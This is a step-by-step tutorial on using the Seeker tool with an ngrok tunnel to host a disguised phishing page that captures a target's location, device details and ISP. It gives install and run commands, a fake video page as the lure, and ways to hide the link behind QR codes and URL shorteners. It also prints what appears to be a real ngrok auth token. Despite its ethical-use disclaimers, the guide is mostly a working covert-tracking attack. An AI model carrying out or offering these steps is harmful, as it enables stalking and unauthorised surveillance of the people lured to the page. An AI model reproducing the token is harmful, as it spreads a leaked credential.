Finding Someone's Location with Seeker
📍 How to Use Seeker to Get Location via Social Engineering (Educational Purpose)
⚠️ Disclaimer:
This guide is for ethical hacking and cybersecurity learning only. Always obtain permission from targets. Misuse may result in legal consequences.
🛠️ What is Seeker?
Seeker is an open-source tool developed by TheWhiteH4t that can generate a fake web page to socially engineer and capture the victim’s location using their device’s geolocation feature.
🧰 Requirements
Linux OS (Kali Linux or Ubuntu preferred)
Python 3
Git
Ngrok (for hosting externally)
🪜 Step-by-Step Guide
🔹 1. Install Seeker
Open your terminal and run:
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh🔹 2. Run Seeker
Make sure Python 3 is installed, then run:
##################
# Usage Examples #
##################
# Step 1 : In first terminal
$ python3 seeker.py
# Step 2 : In second terminal start a tunnel service such as ngrok
$ ./ngrok http 8080
###########
# Options #
###########
# Ouput KML File for Google Earth
$ python3 seeker.py -k <filename>
# Use Custom Port
$ python3 seeker.py -p 1337
$ ./ngrok http 1337
# Pre-select a specific template
$ python3 seeker.py -t 1🌐 Setting Up External Access with Ngrok
🔹 3. Download Ngrok
Open a browser and visit https://ngrok.com. Sign in or register, then:
Copy the download link for Linux.
In the terminal, run:
curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
| sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
&& echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
| sudo tee /etc/apt/sources.list.d/ngrok.list \
&& sudo apt update \
&& sudo apt install ngrok🔹 4. Authenticate Ngrok
Get your auth token from your Ngrok dashboard and run:
ngrok config add-authtoken 22VSdPVkLSe5meidCxV6r4uKaSv_3BJPSS3z8PfrzhrkLLMHp🎯 Create a Phishing Page
You can use custom templates in Seeker.
Seeker will ask for a YouTube video link (for disguise).
Paste the link when prompted.
Provide a site name and title (e.g., “Watch Now”, “Trending Video”).
Optionally, add an image URL and description.
🌍 Expose Localhost to the Internet
In a new terminal window:
ngrok http http://localhost:8080Ngrok will generate a public forwarding link. This is the URL you will share with your "victim" (legally and ethically!).
📲 Delivering the Link
Options:
Send the Ngrok URL directly
Convert it into a QR code using any generator (e.g., https://www.qr-code-generator.com/)
Use URL shorteners for better disguise
📌 Capture Location Data
Once the target opens the link and gives browser permission:
Seeker logs their latitude, longitude, device info, and ISP details
A clickable Google Maps link will be available
📌 Note for Cybersecurity Students
This is a classic social engineering attack using a fake landing page. It’s commonly used in red teaming and penetration testing assessments to test user awareness.
🎓 Educational Use Only
Do NOT use Seeker for:
Stalking
Unauthorized tracking
Spying
Use it in legal penetration tests, CTFs, and lab environments only.
Last updated